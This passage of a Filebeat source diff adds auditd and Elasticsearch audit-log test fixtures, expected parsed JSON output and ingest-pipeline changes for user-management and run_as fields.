subj=system_u:system_r:virtd_t:s0-s0:c0.c1023 msg='virt=kvm vm=\"rhel-work3\" uuid=5501263b-181d-47ed-ab03-a6066f3d26bf vm-ctx=system_u:system_r:svirt_t:s0:c444,c977 img-ctx=system_u:object_r:svirt_image_t:s0:c444,c977 model=selinux exe=\"/usr/sbin/libvirtd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", "event.type": "creation", "fileset.name": "log", diff --git a/filebeat/module/auditd/log/test/useradd.log b/filebeat/module/auditd/log/test/useradd.log new file mode 100644 index 000000000000..3f99f5e3b41f --- /dev/null +++ b/filebeat/module/auditd/log/test/useradd.log @@ -0,0 +1,8 @@ +type=ADD_GROUP msg=audit(1610903553.686:584): pid=2940 uid=0 auid=1000 ses=14 msg='op=adding group to /etc/group id=1004 exe="/usr/sbin/groupadd" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=ADD_GROUP msg=audit(1610903553.710:586): pid=2940 uid=0 auid=1000 ses=14 msg='op=adding group to /etc/gshadow id=1004 exe="/usr/sbin/groupadd" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=ADD_GROUP msg=audit(1610903553.710:587): pid=2940 uid=0 auid=1000 ses=14 msg='op= id=1004 exe="/usr/sbin/groupadd" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=ADD_USER msg=audit(1610903553.730:591): pid=2945 uid=0 auid=1000 ses=14 msg='op=adding user id=1004 exe="/usr/sbin/useradd" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=USER_ACCT msg=audit(1610903553.814:593): pid=2948 uid=0 auid=1000 ses=14 msg='pam_tally2 uid=1004 reset=0 exe="/sbin/pam_tally2" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/2 res=success' +type=USER_CHAUTHTOK msg=audit(1610903558.174:594): pid=2953 uid=0 auid=1000 ses=14 msg='op=PAM:chauthtok acct="charlie" exe="/usr/bin/passwd" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=USER_AUTH msg=audit(1610903558.178:595): pid=2954 uid=0 auid=1000 ses=14 msg='op=PAM:authentication acct="root" exe="/usr/bin/chfn" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=USER_ACCT msg=audit(1610903558.178:596): pid=2954 uid=0 auid=1000 ses=14 msg='op=PAM:accounting acct="root" exe="/usr/bin/chfn" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' diff --git a/filebeat/module/auditd/log/test/useradd.log-expected.json b/filebeat/module/auditd/log/test/useradd.log-expected.json new file mode 100644 index 000000000000..3eb42fe0a863 --- /dev/null +++ b/filebeat/module/auditd/log/test/useradd.log-expected.json @@ -0,0 +1,300 @@ +[ + { + "@timestamp": "2021-01-17T17:12:33.686Z", + "auditd.log.hostname": "ubuntu-bionic", + "auditd.log.id": "1004", + "auditd.log.op": "adding group to /etc/group", + "auditd.log.record_type": "ADD_GROUP", + "auditd.log.sequence": 584, + "auditd.log.ses": "14", + "auditd.log.uid": "0", + "event.action": [ + "added-group-account-to" + ], + "event.category": [ + "iam" + ], + "event.dataset": "auditd.log", + "event.kind": "event", + "event.module": "auditd", + "event.original": "type=ADD_GROUP msg=audit(1610903553.686:584): pid=2940 uid=0 auid=1000 ses=14 msg='op=adding group to /etc/group id=1004 exe=\"/usr/sbin/groupadd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", + "event.outcome": "success", + "event.type": [ + "group", + "creation" + ], + "fileset.name": "log", + "group.id": "1004", + "input.type": "log", + "log.offset": 0, + "process.executable": "/usr/sbin/groupadd", + "process.pid": 2940, + "service.type": "auditd", + "source.address": "127.0.0.1", + "source.ip": "127.0.0.1", + "user.audit.id": "1000", + "user.effective.id": "0", + "user.id": "1000", + "user.terminal": "pts/2" + }, + { + "@timestamp": "2021-01-17T17:12:33.710Z", + "auditd.log.hostname": "ubuntu-bionic", + "auditd.log.id": "1004", + "auditd.log.op": "adding group to /etc/gshadow", + "auditd.log.record_type": "ADD_GROUP", + "auditd.log.sequence": 586, + "auditd.log.ses": "14", + "auditd.log.uid": "0", + "event.action": [ + "added-group-account-to" + ], + "event.category": [ + "iam" + ], + "event.dataset": "auditd.log", + "event.kind": "event", + "event.module": "auditd", + "event.original": "type=ADD_GROUP msg=audit(1610903553.710:586): pid=2940 uid=0 auid=1000 ses=14 msg='op=adding group to /etc/gshadow id=1004 exe=\"/usr/sbin/groupadd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", + "event.outcome": "success", + "event.type": [ + "group", + "creation" + ], + "fileset.name": "log", + "group.id": "1004", + "input.type": "log", + "log.offset": 212, + "process.executable": "/usr/sbin/groupadd", + "process.pid": 2940, + "service.type": "auditd", + "source.address": "127.0.0.1", + "source.ip": "127.0.0.1", + "user.audit.id": "1000", + "user.effective.id": "0", + "user.id": "1000", + "user.terminal": "pts/2" + }, + { + "@timestamp": "2021-01-17T17:12:33.710Z", + "auditd.log.hostname": "ubuntu-bionic", + "auditd.log.id": "1004", + "auditd.log.record_type": "ADD_GROUP", + "auditd.log.sequence": 587, + "auditd.log.ses": "14", + "auditd.log.uid": "0", + "event.action": [ + "added-group-account-to" + ], + "event.category": [ + "iam" + ], + "event.dataset": "auditd.log", + "event.kind": "event", + "event.module": "auditd", + "event.original": "type=ADD_GROUP msg=audit(1610903553.710:587): pid=2940 uid=0 auid=1000 ses=14 msg='op= id=1004 exe=\"/usr/sbin/groupadd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", + "event.outcome": "success", + "event.type": [ + "group", + "creation" + ], + "fileset.name": "log", + "group.id": "1004", + "input.type": "log", + "log.offset": 426, + "process.executable": "/usr/sbin/groupadd", + "process.pid": 2940, + "service.type": "auditd", + "source.address": "127.0.0.1", + "source.ip": "127.0.0.1", + "user.audit.id": "1000", + "user.effective.id": "0", + "user.id": "1000", + "user.terminal": "pts/2" + }, + { + "@timestamp": "2021-01-17T17:12:33.730Z", + "auditd.log.hostname": "ubuntu-bionic", + "auditd.log.id": "1004", + "auditd.log.op": "adding user", + "auditd.log.record_type": "ADD_USER", + "auditd.log.sequence": 591, + "auditd.log.ses": "14", + "auditd.log.uid": "0", + "event.action": [ + "added-user-account" + ], + "event.category": [ + "iam" + ], + "event.dataset": "auditd.log", + "event.kind": "event", + "event.module": "auditd", + "event.original": "type=ADD_USER msg=audit(1610903553.730:591): pid=2945 uid=0 auid=1000 ses=14 msg='op=adding user id=1004 exe=\"/usr/sbin/useradd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", + "event.outcome": "success", + "event.type": [ + "user", + "creation" + ], + "fileset.name": "log", + "input.type": "log", + "log.offset": 612, + "process.executable": "/usr/sbin/useradd", + "process.pid": 2945, + "service.type": "auditd", + "source.address": "127.0.0.1", + "source.ip": "127.0.0.1", + "user.audit.id": "1000", + "user.effective.id": "0", + "user.id": "1000", + "user.target.id": "1004", + "user.terminal": "pts/2" + }, + { + "@timestamp": "2021-01-17T17:12:33.814Z", + "auditd.log.hostname": "localhost", + "auditd.log.record_type": "USER_ACCT", + "auditd.log.reset": "0", + "auditd.log.sequence": 593, + "auditd.log.ses": "14", + "auditd.log.uid": [ + "0", + "1004" + ], + "event.action": [ + "was-authorized" + ], + "event.category": [ + "authentication" + ], + "event.dataset": "auditd.log", + "event.kind": "event", + "event.module": "auditd", + "event.original": "type=USER_ACCT msg=audit(1610903553.814:593): pid=2948 uid=0 auid=1000 ses=14 msg='pam_tally2 uid=1004 reset=0 exe=\"/sbin/pam_tally2\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/2 res=success'", + "event.outcome": "success", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.offset": 807, + "process.executable": "/sbin/pam_tally2", + "process.pid": 2948, + "service.type": "auditd", + "source.address": "127.0.0.1", + "source.ip": "127.0.0.1", + "user.audit.id": "1000", + "user.id": "1000", + "user.terminal": "/dev/pts/2" + }, + { + "@timestamp": "2021-01-17T17:12:38.174Z", + "auditd.log.hostname": "ubuntu-bionic", + "auditd.log.op": "PAM:chauthtok", + "auditd.log.record_type": "USER_CHAUTHTOK", + "auditd.log.sequence": 594, + "auditd.log.ses": "14", + "auditd.log.uid": "0", + "event.action": [ + "changed-password" + ], + "event.category": [ + "iam" + ], + "event.dataset": "auditd.log", + "event.kind": "event", + "event.module": "auditd", + "event.original": "type=USER_CHAUTHTOK msg=audit(1610903558.174:594): pid=2953 uid=0 auid=1000 ses=14 msg='op=PAM:chauthtok acct=\"charlie\" exe=\"/usr/bin/passwd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", + "event.outcome": "success", + "event.type": [ + "user", + "change" + ], + "fileset.name": "log", + "input.type": "log", + "log.offset": 1008, + "process.executable": "/usr/bin/passwd", + "process.pid": 2953, + "service.type": "auditd", + "source.address": "127.0.0.1", + "source.ip": "127.0.0.1", + "user.audit.id": "1000", + "user.effective.id": "0", + "user.id": "1000", + "user.name": "charlie", + "user.target.name": "charlie", + "user.terminal": "pts/2" + }, + { + "@timestamp": "2021-01-17T17:12:38.178Z", + "auditd.log.hostname": "ubuntu-bionic", + "auditd.log.op": "PAM:authentication", + "auditd.log.record_type": "USER_AUTH", + "auditd.log.sequence": 595, + "auditd.log.ses": "14", + "auditd.log.uid": "0", + "event.action": [ + "authenticated" + ], + "event.category": [ + "authentication" + ], + "event.dataset": "auditd.log", + "event.kind": "event", + "event.module": "auditd", + "event.original": "type=USER_AUTH msg=audit(1610903558.178:595): pid=2954 uid=0 auid=1000 ses=14 msg='op=PAM:authentication acct=\"root\" exe=\"/usr/bin/chfn\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", + "event.outcome": "success", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.offset": 1216, + "process.executable": "/usr/bin/chfn", + "process.pid": 2954, + "service.type": "auditd", + "source.address": "127.0.0.1", + "source.ip": "127.0.0.1", + "user.audit.id": "1000", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "root", + "user.terminal": "pts/2" + }, + { + "@timestamp": "2021-01-17T17:12:38.178Z", + "auditd.log.hostname": "ubuntu-bionic", + "auditd.log.op": "PAM:accounting", + "auditd.log.record_type": "USER_ACCT", + "auditd.log.sequence": 596, + "auditd.log.ses": "14", + "auditd.log.uid": "0", + "event.action": [ + "was-authorized" + ], + "event.category": [ + "authentication" + ], + "event.dataset": "auditd.log", + "event.kind": "event", + "event.module": "auditd", + "event.original": "type=USER_ACCT msg=audit(1610903558.178:596): pid=2954 uid=0 auid=1000 ses=14 msg='op=PAM:accounting acct=\"root\" exe=\"/usr/bin/chfn\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", + "event.outcome": "success", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.offset": 1419, + "process.executable": "/usr/bin/chfn", + "process.pid": 2954, + "service.type": "auditd", + "source.address": "127.0.0.1", + "source.ip": "127.0.0.1", + "user.audit.id": "1000", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "root", + "user.terminal": "pts/2" + } +] \ No newline at end of file diff --git a/filebeat/module/elasticsearch/audit/_meta/fields.yml b/filebeat/module/elasticsearch/audit/_meta/fields.yml index ceb94c00dd55..38774e4f8b9c 100644 --- a/filebeat/module/elasticsearch/audit/_meta/fields.yml +++ b/filebeat/module/elasticsearch/audit/_meta/fields.yml @@ -1,6 +1,5 @@ - name: audit type: group - description: > fields: - name: layer description: "The layer from which this event originated: rest, transport or ip_filter" @@ -26,6 +25,12 @@ description: "Roles to which the principal belongs" example: [ "kibana_admin", "beats_admin" ] type: keyword + - name: user.run_as.name + type: keyword + - name: user.run_as.realm + type: keyword + - name: component + type: keyword - name: action description: "The name of the action that was executed" example: "cluster:monitor/main" @@ -63,3 +68,5 @@ migration: true - name: message type: text + - name: invalidate.apikeys.owned_by_authenticated_user + type: boolean diff --git a/filebeat/module/elasticsearch/audit/config/audit.yml b/filebeat/module/elasticsearch/audit/config/audit.yml index 1f8b49a6c550..bdf1cf8696ea 100644 --- a/filebeat/module/elasticsearch/audit/config/audit.yml +++ b/filebeat/module/elasticsearch/audit/config/audit.yml @@ -10,7 +10,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - if: regexp: message: "^{" diff --git a/filebeat/module/elasticsearch/audit/ingest/pipeline-json.yml b/filebeat/module/elasticsearch/audit/ingest/pipeline-json.yml index 93cf638b763c..047942ef960d 100644 --- a/filebeat/module/elasticsearch/audit/ingest/pipeline-json.yml +++ b/filebeat/module/elasticsearch/audit/ingest/pipeline-json.yml @@ -3,8 +3,6 @@ processors: - json: field: message target_field: elasticsearch.audit -- drop: - if: ctx.elasticsearch.audit?.type != null && ctx.elasticsearch.audit.type != 'audit' - remove: field: elasticsearch.audit.type ignore_missing: true @@ -16,6 +14,7 @@ processors: - yyyy-MM-dd'T'HH:mm:ss,SSS - yyyy-MM-dd'T'HH:mm:ss,SSSZ timezone: '{{ event.timezone }}' + ignore_failure: true - remove: if: ctx.elasticsearch.audit['@timestamp'] == null && ctx.event.timezone != null field: event.timezone @@ -80,6 +79,54 @@ processors: - rename: field: elasticsearch.audit.node target_field: elasticsearch.node +- rename: + field: elasticsearch.audit.change.disable.user.name + target_field: user.name + ignore_missing: true +- rename: + field: elasticsearch.audit.change.enable.user.name + target_field: user.name + ignore_missing: true +- rename: + field: elasticsearch.audit.delete.user.name + target_field: user.name + ignore_missing: true +- rename: + field: elasticsearch.audit.put.user.name + target_field: user.name + ignore_missing: true +- rename: + field: elasticsearch.audit.put.user.full_name + target_field: user.full_name + ignore_missing: true +- rename: + field: elasticsearch.audit.put.user.email + target_field: user.email + ignore_missing: true +- remove: + field: elasticsearch.audit.put + ignore_missing: true +- rename: + field: elasticsearch.audit.invalidate.apikeys.user.name + target_field: user.name + ignore_missing: true +- rename: + field: elasticsearch.audit.invalidate.apikeys.user.realm + target_field: elasticsearch.audit.user.realm + ignore_missing: true +- dot_expander: + field: user.run_as.name + path: elasticsearch.audit + ignore_failure: true +- dot_expander: + field: user.run_as.realm + path: elasticsearch.audit + ignore_failure: true +- convert: + field: elasticsearch.audit.user.run_as.name + target_field: user.effective.name + type: string + ignore_failure: true - dot_expander: field: user.name path: elasticsearch.audit @@ -87,6 +134,9 @@ processors: field: elasticsearch.audit.user.name target_field: user.name ignore_missing: true +- dot_expander: + field: user.email + path: elasticsearch.audit - dot_expander: field: request.method path: elasticsearch.audit @@ -104,10 +154,17 @@ processors: - dot_expander: field: cluster.name path: elasticsearch.audit +- dot_expander: + field: cluster.uuid + path: elasticsearch.audit - rename: field: elasticsearch.audit.cluster.name target_field: elasticsearch.cluster.name ignore_missing: true +- rename: + field: elasticsearch.audit.cluster.uuid + target_field: elasticsearch.cluster.uuid + ignore_missing: true - rename: field: elasticsearch.audit.level target_field: log.level diff --git a/filebeat/module/elasticsearch/audit/ingest/pipeline.yml b/filebeat/module/elasticsearch/audit/ingest/pipeline.yml index ec3873d2b9fb..1ae5da8dbb76 100644 --- a/filebeat/module/elasticsearch/audit/ingest/pipeline.yml +++ b/filebeat/module/elasticsearch/audit/ingest/pipeline.yml @@ -55,6 +55,10 @@ processors: field: related.user value: "{{user.name}}" if: "ctx?.user?.name != null" +- append: + field: related.user + value: "{{user.effective.name}}" + if: "ctx?.user?.effective?.name != null" - remove: field: elasticsearch.audit.@timestamp - remove: diff --git a/filebeat/module/elasticsearch/audit/test/test-audit-docker.log-expected.json b/filebeat/module/elasticsearch/audit/test/test-audit-docker.log-expected.json index f8127900e70e..66f14a2381ca 100644 --- a/filebeat/module/elasticsearch/audit/test/test-audit-docker.log-expected.json +++ b/filebeat/module/elasticsearch/audit/test/test-audit-docker.log-expected.json @@ -23,6 +23,27 @@ "source.port": 40380, "url.original": "/" }, + { + "@timestamp": "2019-06-11T15:03:32.777Z", + "elasticsearch.audit.component": "o.e.x.s.a.AuthenticationService", + "elasticsearch.audit.message": "Authentication of [elastic] was terminated by realm [reserved] - failed to authenticate user [elastic]", + "elasticsearch.cluster.name": "docker-cluster", + "elasticsearch.cluster.uuid": "xEiKc6ipRiyzU8_8czXrJw", + "elasticsearch.node.id": "Xaq2BFVcQ1OhyMrjL8gNOg", + "elasticsearch.node.name": "dff7befc418f", + "event.category": "database", + "event.dataset": "elasticsearch.audit", + "event.kind": "event", + "event.module": "elasticsearch", + "event.outcome": "failure", + "fileset.name": "audit", + "host.id": "Xaq2BFVcQ1OhyMrjL8gNOg", + "input.type": "log", + "log.level": "INFO", + "log.offset": 299, + "message": "{\"type\": \"server\", \"timestamp\": \"2019-06-11T15:03:32,777+0000\", \"level\": \"INFO\", \"component\": \"o.e.x.s.a.AuthenticationService\", \"cluster.name\": \"docker-cluster\", \"node.name\": \"dff7befc418f\", \"cluster.uuid\": \"xEiKc6ipRiyzU8_8czXrJw\", \"node.id\": \"Xaq2BFVcQ1OhyMrjL8gNOg\", \"message\": \"Authentication of [elastic] was terminated by realm [reserved] - failed to authenticate user [elastic]\" }", + "service.type": "elasticsearch" + }, { "@timestamp": "2019-06-11T15:03:32.778Z", "elasticsearch.audit.layer": "rest", diff --git a/filebeat/module/elasticsearch/audit/test/test-audit.log b/filebeat/module/elasticsearch/audit/test/test-audit.log index 4937ec8ef76d..e775723f5bb0 100644 --- a/filebeat/module/elasticsearch/audit/test/test-audit.log +++ b/filebeat/module/elasticsearch/audit/test/test-audit.log @@ -5,3 +5,10 @@ {"@timestamp":"2018-10-31T09:35:12,303", "node.id":"DSiWcTyeThWtUXLB9J0BMw", "event.type":"transport", "event.action":"access_granted", "user.name":"elastic", "user.realm":"reserved", "user.roles":["superuser"], "origin.type":"rest","origin.address":"[::1]:61711", "action":"cluster:admin/xpack/security/user/change_password", "request.name":"ChangePasswordRequest"} {"@timestamp":"2018-10-31T09:35:12,314", "node.id":"DSiWcTyeThWtUXLB9J0BMw", "event.type":"transport", "event.action":"access_granted", "user.name":"_xpack_security", "user.realm":"__attach", "user.roles":["superuser"], "origin.type":"local_node", "origin.address":"127.0.0.1:9300", "action":"indices:admin/create", "request.name":"CreateIndexRequest", "indices":[".security-6"]} {"@timestamp":"2019-01-27T20:15:10,380", "node.name":"node-0", "node.id":"y8fa3M5zSSGo1M_KJRMUXw", "event.type":"rest", "event.action":"authentication_success", "user.name":"elastic-admin", "origin.type":"rest", "origin.address":"[::1]:58955", "realm":"default_file", "url.path":"/_search", "request.method":"GET", "request.body":"\n{\n \"query\" : {\n \"term\" : { \"user\" : \"kimchy\" }\n }\n}\n", "request.id":"WzL_kb6VSvOhAq0twPvHOQ"} +{"type":"audit", "timestamp":"2020-12-30T23:17:28,308+0200", "node.id":"0RMNyghkQYCc_gVd1G6tZQ", "event.type":"security_config_change", "event.action":"change_disable_user", "request.id":"qvLIgw_eTvyK3cgV-GaLVg", "change":{"disable":{"user":{"name":"user1"}}}} +{"type":"audit", "timestamp":"2020-12-30T23:17:34,843+0200", "node.id":"0RMNyghkQYCc_gVd1G6tZQ", "event.type":"security_config_change", "event.action":"change_enable_user", "request.id":"BO3QU3qeTb-Ei0G0rUOalQ", "change":{"enable":{"user":{"name":"user1"}}}} +{"type":"audit", "timestamp":"2020-12-30T22:19:41,345+0200", "node.id":"0RMNyghkQYCc_gVd1G6tZQ", "event.type":"security_config_change", "event.action":"delete_user", "request.id":"au5a1Cc3RrebDMitMGGNCw", "delete":{"user":{"name":"jacknich"}}} +{"type":"audit", "timestamp":"2020-12-31T00:36:30,247+0200", "node.id":"9clhpgjJRR-iKzOw20xBNQ", "event.type":"security_config_change", "event.action":"invalidate_apikeys", "request.id":"7lyIQU9QTFqSrTxD0CqnTQ", "invalidate":{"apikeys":{"owned_by_authenticated_user":false,"user":{"name":"myuser","realm":"native1"}}}} +{"type":"audit", "timestamp":"2020-12-30T22:10:09,749+0200", "node.id":"0RMNyghkQYCc_gVd1G6tZQ", "event.type":"security_config_change", "event.action":"put_user", "request.id":"VIiSvhp4Riim_tpkQCVSQA", "put":{"user":{"name":"user1","enabled":false,"roles":["admin","other_role1"],"full_name":"Jack Sparrow","email":"jack@blackpearl.com","has_password":true,"metadata":{"cunning":10}}}} +{"type":"audit", "timestamp":"2020-12-30T22:49:34,859+0200", "node.id":"0RMNyghkQYCc_gVd1G6tZQ", "event.type":"transport", "event.action":"run_as_denied", "user.name":"user1", "user.run_as.name":"user1", "user.realm":"default_native", "user.run_as.realm":"default_native", "user.roles":["test_role"], "origin.type":"rest", "origin.address":"[::1]:52662", "request.id":"RcaSt872RG-R_WJBEGfYXA", "action":"indices:data/read/search", "request.name":"SearchRequest", "indices":["alias1"]} +{"type":"audit", "timestamp":"2020-12-30T22:44:42,068+0200", "node.id":"0RMNyghkQYCc_gVd1G6tZQ", "event.type":"transport", "event.action":"run_as_granted", "user.name":"elastic", "user.run_as.name":"user1", "user.realm":"reserved", "user.run_as.realm":"default_native", "user.roles":["superuser"], "origin.type":"rest", "origin.address":"[::1]:52623", "request.id":"dGqPTdEQSX2TAPS3cvc1qA", "action":"indices:data/read/search", "request.name":"SearchRequest", "indices":["alias1"]} diff --git a/filebeat/module/elasticsearch/audit/test/test-audit.log-expected.json b/filebeat/module/elasticsearch/audit/test/test-audit.log-expected.json index 96795c1550c0..ce89459bd51f 100644 --- a/filebeat/module/elasticsearch/audit/test/test-audit.log-expected.json +++ b/filebeat/module/elasticsearch/audit/test/test-audit.log-expected.json @@ -216,5 +216,197 @@ "source.port": 58955, "url.original": "/_search", "user.name": "elastic-admin" + }, + { + "@timestamp": "2020-12-30T21:17:28.308Z", + "elasticsearch.audit.layer": "security_config_change", + "elasticsearch.audit.request.id": "qvLIgw_eTvyK3cgV-GaLVg", + "elasticsearch.node.id": "0RMNyghkQYCc_gVd1G6tZQ", + "event.action": "change_disable_user", + "event.category": "database", + "event.dataset": "elasticsearch.audit", + "event.kind": "event", + "event.module": "elasticsearch", + "event.outcome": "failure", + "fileset.name": "audit", + "host.id": "0RMNyghkQYCc_gVd1G6tZQ", + "input.type": "log", + "log.offset": 2509, + "message": "{\"type\":\"audit\", \"timestamp\":\"2020-12-30T23:17:28,308+0200\", \"node.id\":\"0RMNyghkQYCc_gVd1G6tZQ\", \"event.type\":\"security_config_change\", \"event.action\":\"change_disable_user\", \"request.id\":\"qvLIgw_eTvyK3cgV-GaLVg\", \"change\":{\"disable\":{\"user\":{\"name\":\"user1\"}}}}", + "related.user": [ + "user1" + ], + "service.type": "elasticsearch", + "user.name": "user1" + }, + { + "@timestamp": "2020-12-30T21:17:34.843Z", + "elasticsearch.audit.layer": "security_config_change", + "elasticsearch.audit.request.id": "BO3QU3qeTb-Ei0G0rUOalQ", + "elasticsearch.node.id": "0RMNyghkQYCc_gVd1G6tZQ", + "event.action": "change_enable_user", + "event.category": "database", + "event.dataset": "elasticsearch.audit", + "event.kind": "event", + "event.module": "elasticsearch", + "event.outcome": "failure", + "fileset.name": "audit", + "host.id": "0RMNyghkQYCc_gVd1G6tZQ", + "input.type": "log", + "log.offset": 2770, + "message": "{\"type\":\"audit\", \"timestamp\":\"2020-12-30T23:17:34,843+0200\", \"node.id\":\"0RMNyghkQYCc_gVd1G6tZQ\", \"event.type\":\"security_config_change\", \"event.action\":\"change_enable_user\", \"request.id\":\"BO3QU3qeTb-Ei0G0rUOalQ\", \"change\":{\"enable\":{\"user\":{\"name\":\"user1\"}}}}", + "related.user": [ + "user1" + ], + "service.type": "elasticsearch", + "user.name": "user1" + }, + { + "@timestamp": "2020-12-30T20:19:41.345Z", + "elasticsearch.audit.layer": "security_config_change", + "elasticsearch.audit.request.id": "au5a1Cc3RrebDMitMGGNCw", + "elasticsearch.node.id": "0RMNyghkQYCc_gVd1G6tZQ", + "event.action": "delete_user", + "event.category": "database", + "event.dataset": "elasticsearch.audit", + "event.kind": "event", + "event.module": "elasticsearch", + "event.outcome": "failure", + "fileset.name": "audit", + "host.id": "0RMNyghkQYCc_gVd1G6tZQ", + "input.type": "log", + "log.offset": 3029, + "message": "{\"type\":\"audit\", \"timestamp\":\"2020-12-30T22:19:41,345+0200\", \"node.id\":\"0RMNyghkQYCc_gVd1G6tZQ\", \"event.type\":\"security_config_change\", \"event.action\":\"delete_user\", \"request.id\":\"au5a1Cc3RrebDMitMGGNCw\", \"delete\":{\"user\":{\"name\":\"jacknich\"}}}", + "related.user": [ + "jacknich" + ], + "service.type": "elasticsearch", + "user.name": "jacknich" + }, + { + "@timestamp": "2020-12-30T22:36:30.247Z", + "elasticsearch.audit.invalidate.apikeys.owned_by_authenticated_user": false, + "elasticsearch.audit.layer": "security_config_change", + "elasticsearch.audit.request.id": "7lyIQU9QTFqSrTxD0CqnTQ", + "elasticsearch.audit.user.realm": "native1", + "elasticsearch.node.id": "9clhpgjJRR-iKzOw20xBNQ", + "event.action": "invalidate_apikeys", + "event.category": "database", + "event.dataset": "elasticsearch.audit", + "event.kind": "event", + "event.module": "elasticsearch", + "event.outcome": "failure", + "fileset.name": "audit", + "host.id": "9clhpgjJRR-iKzOw20xBNQ", + "input.type": "log", + "log.offset": 3273, + "message": "{\"type\":\"audit\", \"timestamp\":\"2020-12-31T00:36:30,247+0200\", \"node.id\":\"9clhpgjJRR-iKzOw20xBNQ\", \"event.type\":\"security_config_change\", \"event.action\":\"invalidate_apikeys\", \"request.id\":\"7lyIQU9QTFqSrTxD0CqnTQ\", \"invalidate\":{\"apikeys\":{\"owned_by_authenticated_user\":false,\"user\":{\"name\":\"myuser\",\"realm\":\"native1\"}}}}", + "related.user": [ + "myuser" + ], + "service.type": "elasticsearch", + "user.name": "myuser" + }, + { + "@timestamp": "2020-12-30T20:10:09.749Z", + "elasticsearch.audit.layer": "security_config_change", + "elasticsearch.audit.request.id": "VIiSvhp4Riim_tpkQCVSQA", + "elasticsearch.node.id": "0RMNyghkQYCc_gVd1G6tZQ", + "event.action": "put_user", + "event.category": "database", + "event.dataset": "elasticsearch.audit", + "event.kind": "event", + "event.module": "elasticsearch", + "event.outcome": "failure", + "fileset.name": "audit", + "host.id": "0RMNyghkQYCc_gVd1G6tZQ", + "input.type": "log", + "log.offset": 3592, + "message": "{\"type\":\"audit\", \"timestamp\":\"2020-12-30T22:10:09,749+0200\", \"node.id\":\"0RMNyghkQYCc_gVd1G6tZQ\", \"event.type\":\"security_config_change\", \"event.action\":\"put_user\", \"request.id\":\"VIiSvhp4Riim_tpkQCVSQA\", \"put\":{\"user\":{\"name\":\"user1\",\"enabled\":false,\"roles\":[\"admin\",\"other_role1\"],\"full_name\":\"Jack Sparrow\",\"email\":\"jack@blackpearl.com\",\"has_password\":true,\"metadata\":{\"cunning\":10}}}}", + "related.user": [ + "user1" + ], + "service.type": "elasticsearch", + "user.email": "jack@blackpearl.com", + "user.full_name": "Jack Sparrow", + "user.name": "user1" + }, + { + "@timestamp": "2020-12-30T20:49:34.859Z", + "elasticsearch.audit.action": "indices:data/read/search", + "elasticsearch.audit.indices": [ + "alias1" + ], + "elasticsearch.audit.layer": "transport", + "elasticsearch.audit.origin.type": "rest", + "elasticsearch.audit.request.id": "RcaSt872RG-R_WJBEGfYXA", + "elasticsearch.audit.request.name": "SearchRequest", + "elasticsearch.audit.user.realm": "default_native", + "elasticsearch.audit.user.roles": [ + "test_role" + ], + "elasticsearch.audit.user.run_as.name": "user1", + "elasticsearch.audit.user.run_as.realm": "default_native", + "elasticsearch.node.id": "0RMNyghkQYCc_gVd1G6tZQ", + "event.action": "run_as_denied", + "event.category": "database", + "event.dataset": "elasticsearch.audit", + "event.kind": "event", + "event.module": "elasticsearch", + "event.outcome": "failure", + "fileset.name": "audit", + "host.id": "0RMNyghkQYCc_gVd1G6tZQ", + "input.type": "log", + "log.offset": 3978, + "message": "{\"type\":\"audit\", \"timestamp\":\"2020-12-30T22:49:34,859+0200\", \"node.id\":\"0RMNyghkQYCc_gVd1G6tZQ\", \"event.type\":\"transport\", \"event.action\":\"run_as_denied\", \"user.name\":\"user1\", \"user.run_as.name\":\"user1\", \"user.realm\":\"default_native\", \"user.run_as.realm\":\"default_native\", \"user.roles\":[\"test_role\"], \"origin.type\":\"rest\", \"origin.address\":\"[::1]:52662\", \"request.id\":\"RcaSt872RG-R_WJBEGfYXA\", \"action\":\"indices:data/read/search\", \"request.name\":\"SearchRequest\", \"indices\":[\"alias1\"]}", + "related.user": [ + "user1", + "user1" + ], + "service.type": "elasticsearch", + "source.address": "[::1]:52662", + "source.ip": "::1", + "source.port": 52662, + "user.effective.name": "user1", + "user.name": "user1" + }, + { + "@timestamp": "2020-12-30T20:44:42.068Z", + "elasticsearch.audit.action": "indices:data/read/search", + "elasticsearch.audit.indices": [ + "alias1" + ], + "elasticsearch.audit.layer": "transport", + "elasticsearch.audit.origin.type": "rest", + "elasticsearch.audit.request.id": "dGqPTdEQSX2TAPS3cvc1qA", + "elasticsearch.audit.request.name": "SearchRequest", + "elasticsearch.audit.user.realm": "reserved", + "elasticsearch.audit.user.roles": [ + "superuser" + ], + "elasticsearch.audit.user.run_as.name": "user1", + "elasticsearch.audit.user.run_as.realm": "default_native", + "elasticsearch.node.id": "0RMNyghkQYCc_gVd1G6tZQ", + "event.action": "run_as_granted", + "event.category": "database", + "event.dataset": "elasticsearch.audit", + "event.kind": "event", + "event.module": "elasticsearch", + "event.outcome": "success", + "fileset.name": "audit", + "host.id": "0RMNyghkQYCc_gVd1G6tZQ", + "input.type": "log", + "log.offset": 4463, + "message": "{\"type\":\"audit\", \"timestamp\":\"2020-12-30T22:44:42,068+0200\", 